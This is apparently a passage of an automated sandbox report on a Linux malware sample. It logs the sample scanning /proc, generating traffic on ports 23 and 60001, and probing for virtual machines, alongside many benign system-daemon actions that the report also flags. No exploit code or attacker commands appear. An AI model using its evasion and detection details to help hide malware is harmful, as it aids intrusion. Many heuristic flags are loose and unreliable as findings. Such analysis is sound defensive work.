Source: /bin/sh (PID: 5885) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*amdgpu[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
Source: /bin/sh (PID: 5888) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*amdgpu[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
Source: /bin/sh (PID: 5891) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nouveau[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
Source: /bin/sh (PID: 5893) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nouveau[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
Source: /bin/sh (PID: 6005) Grep executable: /usr/bin/grep -> grep -F .utf8
Reads system information from the proc file system
Source: /lib/systemd/systemd-journald (PID: 5305) Reads from proc file: /proc/meminfo Jump to behavior
Source: /lib/systemd/systemd-journald (PID: 5568) Reads from proc file: /proc/meminfo Jump to behavior
Source: /lib/systemd/systemd-journald (PID: 5672) Reads from proc file: /proc/meminfo Jump to behavior
Source: /lib/systemd/systemd-journald (PID: 5768) Reads from proc file: /proc/meminfo
Source: /lib/systemd/systemd-journald (PID: 5889) Reads from proc file: /proc/meminfo
Source: /lib/systemd/systemd-journald (PID: 5992) Reads from proc file: /proc/meminfo
Enumerates processes within the "proc" file system
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/5143/exe Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/5265/fd Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/5386/exe Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/5268/fd Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/5268/exe Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/1582/fd Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/1582/exe Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/3088/exe Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/1579/fd Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/1579/exe Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/1699/fd Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/1698/fd Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/1335/fd Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/1335/exe Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/1334/fd Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/1334/exe Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/1576/fd Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/1576/exe Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/2302/fd Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/2302/exe Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/910/exe Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/912/fd Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/912/fd Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/912/exe Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/2307/fd Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/2307/exe Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/918/fd Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/918/fd Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/918/exe Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/5151/exe Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/5274/exe Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/5275/exe Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/1594/fd Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/1594/exe Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/5271/fd Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/1349/fd Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/1349/exe Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/1/fd Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/1/fd Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/1586/fd Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/1586/exe Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/1465/fd Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/1465/exe Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/1344/fd Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/1344/exe Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/1463/fd Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/1463/exe Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/800/fd Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/800/fd Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/800/exe Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/801/fd Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/801/fd Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/801/exe Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/1900/fd Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/491/fd Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/491/fd Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/491/exe Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/1599/fd Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/1599/exe Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/1477/fd Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/1477/exe Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/1476/fd Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/1476/exe Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/1475/fd Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/1475/exe Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/5039/fd Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/5039/exe Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/936/fd Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/936/fd Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/936/exe Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/2208/fd Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/2208/exe Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/5177/fd Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/5177/exe Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/5178/fd Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/5178/exe Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/1809/fd Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/1494/fd Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/1494/exe Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/1489/fd Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/1489/exe Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/2226/fd Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/2223/fd Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/2102/fd Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/5857/exe Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/5859/exe Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/5752/exe Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/5873/exe Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/2242/fd Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/1389/fd Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/1389/exe Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/720/fd Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/720/fd Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/720/exe Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/2114/fd Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/2235/fd Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/721/fd Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/721/fd Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/721/exe Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/5500/exe Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/5863/exe Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/847/fd Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/847/fd Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/847/exe Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) File opened: /proc/5747/exe Jump to behavior
Executes the "systemctl" command used for controlling the systemd system and service manager
Source: /usr/sbin/invoke-rc.d (PID: 5239) Systemctl executable: /usr/bin/systemctl -> systemctl --quiet is-enabled cups.service Jump to behavior
Source: /usr/sbin/invoke-rc.d (PID: 5243) Systemctl executable: /usr/bin/systemctl -> systemctl --quiet is-active cups.service Jump to behavior
Source: /usr/lib/rsyslog/rsyslog-rotate (PID: 5247) Systemctl executable: /usr/bin/systemctl -> systemctl kill -s HUP rsyslog.service Jump to behavior
Creates hidden files and/or directories
Source: /usr/bin/whoopsie (PID: 5370) Directory: /nonexistent/.cache Jump to behavior
Source: /usr/lib/policykit-1/polkitd (PID: 5440) Directory: /root/.cache Jump to behavior
Source: /usr/lib/gdm3/gdm-wayland-session (PID: 5527) Directory: /var/lib/gdm3/.cache Jump to behavior
Source: /usr/lib/accountsservice/accounts-daemon (PID: 5506) Directory: /root/.cache Jump to behavior
Source: /usr/bin/whoopsie (PID: 5570) Directory: /nonexistent/.cache Jump to behavior
Source: /usr/lib/policykit-1/polkitd (PID: 5645) Directory: /root/.cache Jump to behavior
Source: /usr/bin/whoopsie (PID: 5681) Directory: /nonexistent/.cache
Source: /usr/lib/policykit-1/polkitd (PID: 5756) Directory: /root/.cache
Source: /usr/lib/accountsservice/accounts-daemon (PID: 5776) Directory: /root/.cache
Source: /usr/bin/whoopsie (PID: 5789) Directory: /nonexistent/.cache
Source: /usr/lib/policykit-1/polkitd (PID: 5863) Directory: /root/.cache
Source: /usr/bin/whoopsie (PID: 5907) Directory: /nonexistent/.cache
Source: /usr/lib/policykit-1/polkitd (PID: 5978) Directory: /root/.cache
Source: /usr/lib/accountsservice/accounts-daemon (PID: 5997) Directory: /root/.cache
Sample tries to set the executable flag
Source: /usr/sbin/gdm3 (PID: 5500) File: /var/run/gdm3 (bits: - usr: -x grp: x all: rwx) Jump to behavior
Source: /usr/sbin/gdm3 (PID: 5500) File: /var/log/gdm3 (bits: - usr: -x grp: x all: rwx) Jump to behavior
Source: /usr/lib/accountsservice/accounts-daemon (PID: 5506) File: /var/lib/AccountsService/icons (bits: - usr: rx grp: rwx all: rwx) Jump to behavior
Source: /usr/lib/accountsservice/accounts-daemon (PID: 5506) File: /var/lib/AccountsService/users (bits: - usr: - grp: - all: rwx) Jump to behavior
Source: /usr/sbin/gdm3 (PID: 5770) File: /var/run/gdm3 (bits: - usr: -x grp: x all: rwx)
Source: /usr/sbin/gdm3 (PID: 5770) File: /var/log/gdm3 (bits: - usr: -x grp: x all: rwx)
Source: /usr/lib/accountsservice/accounts-daemon (PID: 5776) File: /var/lib/AccountsService/icons (bits: - usr: rx grp: rwx all: rwx)
Source: /usr/lib/accountsservice/accounts-daemon (PID: 5776) File: /var/lib/AccountsService/users (bits: - usr: - grp: - all: rwx)
Source: /usr/sbin/gdm3 (PID: 5993) File: /var/run/gdm3 (bits: - usr: -x grp: x all: rwx)
Source: /usr/sbin/gdm3 (PID: 5993) File: /var/log/gdm3 (bits: - usr: -x grp: x all: rwx)
Source: /usr/lib/accountsservice/accounts-daemon (PID: 5997) File: /var/lib/AccountsService/icons (bits: - usr: rx grp: rwx all: rwx)
Source: /usr/lib/accountsservice/accounts-daemon (PID: 5997) File: /var/lib/AccountsService/users (bits: - usr: - grp: - all: rwx)
Executes commands using a shell command-line interpreter
Source: /usr/sbin/logrotate (PID: 5234) Shell command executed: sh -c "\n\t\tinvoke-rc.d --quiet cups restart > /dev/null\n" logrotate_script "/var/log/cups/*log " Jump to behavior
Source: /usr/sbin/logrotate (PID: 5245) Shell command executed: sh -c /usr/lib/rsyslog/rsyslog-rotate logrotate_script /var/log/syslog Jump to behavior
Source: /usr/bin/gpu-manager (PID: 5457) Shell command executed: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /etc/modprobe.d/*.conf" Jump to behavior
Source: /usr/bin/gpu-manager (PID: 5459) Shell command executed: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /lib/modprobe.d/*.conf" Jump to behavior
Source: /usr/bin/gpu-manager (PID: 5461) Shell command executed: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /etc/modprobe.d/*.conf" Jump to behavior
Source: /usr/bin/gpu-manager (PID: 5463) Shell command executed: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /lib/modprobe.d/*.conf" Jump to behavior
Source: /usr/bin/gpu-manager (PID: 5465) Shell command executed: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /etc/modprobe.d/*.conf" Jump to behavior
Source: /usr/bin/gpu-manager (PID: 5467) Shell command executed: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /lib/modprobe.d/*.conf" Jump to behavior
Source: /usr/bin/gpu-manager (PID: 5472) Shell command executed: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /etc/modprobe.d/*.conf" Jump to behavior
Source: /usr/bin/gpu-manager (PID: 5474) Shell command executed: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /lib/modprobe.d/*.conf" Jump to behavior
Source: /usr/share/language-tools/language-options (PID: 5520) Shell command executed: sh -c "locale -a | grep -F .utf8 " Jump to behavior
Source: /usr/bin/gpu-manager (PID: 5637) Shell command executed: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /etc/modprobe.d/*.conf" Jump to behavior
Source: /usr/bin/gpu-manager (PID: 5641) Shell command executed: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /lib/modprobe.d/*.conf" Jump to behavior
Source: /usr/bin/gpu-manager (PID: 5646) Shell command executed: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /etc/modprobe.d/*.conf" Jump to behavior
Source: /usr/bin/gpu-manager (PID: 5651) Shell command executed: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /lib/modprobe.d/*.conf" Jump to behavior
Source: /usr/bin/gpu-manager (PID: 5653) Shell command executed: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /etc/modprobe.d/*.conf" Jump to behavior
Source: /usr/bin/gpu-manager (PID: 5659) Shell command executed: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /lib/modprobe.d/*.conf" Jump to behavior
Source: /usr/bin/gpu-manager (PID: 5664) Shell command executed: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /etc/modprobe.d/*.conf" Jump to behavior
Source: /usr/bin/gpu-manager (PID: 5667) Shell command executed: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /lib/modprobe.d/*.conf" Jump to behavior
Source: /usr/share/language-tools/language-options (PID: 5784) Shell command executed: sh -c "locale -a | grep -F .utf8 "
Source: /usr/bin/gpu-manager (PID: 5871) Shell command executed: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /etc/modprobe.d/*.conf"
Source: /usr/bin/gpu-manager (PID: 5874) Shell command executed: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /lib/modprobe.d/*.conf"
Source: /usr/bin/gpu-manager (PID: 5879) Shell command executed: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /etc/modprobe.d/*.conf"
Source: /usr/bin/gpu-manager (PID: 5882) Shell command executed: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /lib/modprobe.d/*.conf"
Source: /usr/bin/gpu-manager (PID: 5884) Shell command executed: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /etc/modprobe.d/*.conf"
Source: /usr/bin/gpu-manager (PID: 5887) Shell command executed: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /lib/modprobe.d/*.conf"
Source: /usr/bin/gpu-manager (PID: 5890) Shell command executed: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /etc/modprobe.d/*.conf"
Source: /usr/bin/gpu-manager (PID: 5892) Shell command executed: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /lib/modprobe.d/*.conf"
Source: /usr/share/language-tools/language-options (PID: 6003) Shell command executed: sh -c "locale -a | grep -F .utf8 "
Source: /usr/sbin/rsyslogd (PID: 5448) Log file created: /var/log/auth.log
Source: /usr/sbin/rsyslogd (PID: 5448) Log file created: /var/log/kern.log
Source: /usr/bin/gpu-manager (PID: 5456) Log file created: /var/log/gpu-manager.log
Source: /usr/bin/gpu-manager (PID: 5636) Log file created: /var/log/gpu-manager.log
Source: /usr/sbin/rsyslogd (PID: 5655) Log file created: /var/log/kern.log
Source: /usr/sbin/rsyslogd (PID: 5655) Log file created: /var/log/auth.log
Source: /usr/sbin/rsyslogd (PID: 5760) Log file created: /var/log/kern.log
Source: /usr/sbin/rsyslogd (PID: 5760) Log file created: /var/log/auth.log
Source: /usr/bin/gpu-manager (PID: 5870) Log file created: /var/log/gpu-manager.log Jump to dropped file
Source: /usr/sbin/rsyslogd (PID: 5873) Log file created: /var/log/kern.log
Source: /usr/sbin/rsyslogd (PID: 5873) Log file created: /var/log/auth.log Jump to dropped file
Source: /usr/sbin/rsyslogd (PID: 5983) Log file created: /var/log/kern.log Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 39118 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 60001 -> 39118
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 55462
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 55464
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 55466
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 55468
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 55470
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 55472
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 55474
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 55476
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 55478
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 55480
Source: unknown Network traffic detected: HTTP traffic on port 34720 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 34720 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 34720 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 34720 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 40918 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 60001 -> 40918
Source: unknown Network traffic detected: HTTP traffic on port 34720 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 47938 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 47938 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 47938 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 47938 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 47938 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 34720 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 47938 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 50054 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 47938 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 33696 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 33696 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 33696 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 33696 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 34720 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 33696 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 45494 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 33696 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 35902 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 35902 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 35902 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 33696 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 35902 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 57730 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 33204 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 60001 -> 57730
Source: unknown Network traffic detected: HTTP traffic on port 42450 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 60001 -> 42450
Source: unknown Network traffic detected: HTTP traffic on port 33696 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 47938 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 33696 -> 60001

Malware Analysis System Evasion:

barindex
Reads CPU information from /sys indicative of miner or evasive malware
Source: /usr/bin/pulseaudio (PID: 5372) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Source: /usr/bin/pkill (PID: 5494) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Source: /usr/bin/pulseaudio (PID: 5635) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Source: /usr/bin/pkill (PID: 5675) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Source: /usr/bin/pulseaudio (PID: 5747) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pulseaudio (PID: 5857) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 5900) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pulseaudio (PID: 5974) Reads CPU info from /sys: /sys/devices/system/cpu/online
Uses the "uname" system call to query kernel version information (possible evasion)
Source: /usr/bin/find (PID: 5232) Queries kernel information via 'uname': Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5263) Queries kernel information via 'uname': Jump to behavior
Source: /lib/systemd/systemd-journald (PID: 5305) Queries kernel information via 'uname': Jump to behavior
Source: /usr/bin/whoopsie (PID: 5370) Queries kernel information via 'uname': Jump to behavior
Source: /usr/bin/pulseaudio (PID: 5372) Queries kernel information via 'uname': Jump to behavior
Source: /usr/sbin/rsyslogd (PID: 5448) Queries kernel information via 'uname': Jump to behavior
Source: /sbin/agetty (PID: 5449) Queries kernel information via 'uname': Jump to behavior
Source: /usr/bin/gpu-manager (PID: 5456) Queries kernel information via 'uname': Jump to behavior
Source: /usr/lib/gdm3/gdm-session-worker (PID: 5523) Queries kernel information via 'uname': Jump to behavior
Source: /lib/systemd/systemd-journald (PID: 5568) Queries kernel information via 'uname': Jump to behavior
Source: /usr/bin/whoopsie (PID: 5570) Queries kernel information via 'uname': Jump to behavior
Source: /usr/bin/pulseaudio (PID: 5635) Queries kernel information via 'uname': Jump to behavior
Source: /usr/bin/gpu-manager (PID: 5636) Queries kernel information via 'uname': Jump to behavior
Source: /usr/sbin/rsyslogd (PID: 5655) Queries kernel information via 'uname': Jump to behavior
Source: /sbin/agetty (PID: 5658) Queries kernel information via 'uname': Jump to behavior
Source: /lib/systemd/systemd-journald (PID: 5672) Queries kernel information via 'uname': Jump to behavior
Source: /usr/bin/whoopsie (PID: 5681) Queries kernel information via 'uname':
Source: /usr/bin/pulseaudio (PID: 5747) Queries kernel information via 'uname':
Source: /usr/sbin/rsyslogd (PID: 5760) Queries kernel information via 'uname':
Source: /sbin/agetty (PID: 5766) Queries kernel information via 'uname':
Source: /lib/systemd/systemd-journald (PID: 5768) Queries kernel information via 'uname':
Source: /usr/bin/whoopsie (PID: 5789) Queries kernel information via 'uname':
Source: /usr/bin/pulseaudio (PID: 5857) Queries kernel information via 'uname':
Source: /usr/bin/gpu-manager (PID: 5870) Queries kernel information via 'uname':
Source: /usr/sbin/rsyslogd (PID: 5873) Queries kernel information via 'uname':
Source: /sbin/agetty (PID: 5881) Queries kernel information via 'uname':
Source: /lib/systemd/systemd-journald (PID: 5889) Queries kernel information via 'uname':
Source: /usr/bin/whoopsie (PID: 5907) Queries kernel information via 'uname':
Source: /usr/bin/pulseaudio (PID: 5974) Queries kernel information via 'uname':
Source: /usr/sbin/rsyslogd (PID: 5983) Queries kernel information via 'uname':
Source: /sbin/agetty (PID: 5988) Queries kernel information via 'uname':
Source: /lib/systemd/systemd-journald (PID: 5992) Queries kernel information via 'uname':
Deletes log files
Source: /usr/sbin/logrotate (PID: 5192) Truncated file: /var/log/cups/access_log.1 Jump to behavior
Source: /usr/sbin/logrotate (PID: 5192) Truncated file: /var/log/syslog.1 Jump to behavior
Source: /usr/bin/gpu-manager (PID: 5456) Truncated file: /var/log/gpu-manager.log Jump to behavior
Source: /usr/bin/gpu-manager (PID: 5636) Truncated file: /var/log/gpu-manager.log Jump to behavior
Source: /usr/bin/gpu-manager (PID: 5870) Truncated file: /var/log/gpu-manager.log
Source: 5241.20.dr Binary or memory string: -9915837702310A--gzvmware kernel module
Source: 5241.20.dr Binary or memory string: -1116261022170A--gzQEMU User Emulator
Source: 5241.20.dr Binary or memory string: qemu-or1k
Source: 5241.20.dr Binary or memory string: qemu-riscv64
Source: 5241.20.dr Binary or memory string: {cqemu
Source: 5241.20.dr Binary or memory string: qemu-arm
Source: 5241.20.dr Binary or memory string: (qemu
Source: 5241.20.dr Binary or memory string: qemu-tilegx
Source: 5241.20.dr Binary or memory string: qemu-hppa
